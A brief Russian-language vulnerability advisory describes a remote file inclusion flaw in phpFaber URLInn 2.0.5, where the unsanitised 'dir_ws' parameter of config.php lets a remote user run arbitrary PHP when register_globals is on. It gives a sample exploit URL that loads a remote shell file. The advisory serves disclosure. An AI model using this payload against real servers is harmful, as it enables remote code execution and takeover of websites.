Программа: phpFaber URLInn 2.0.5

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «dir_ws» сценарием config.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.

Пример:

http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?



Оставить мнение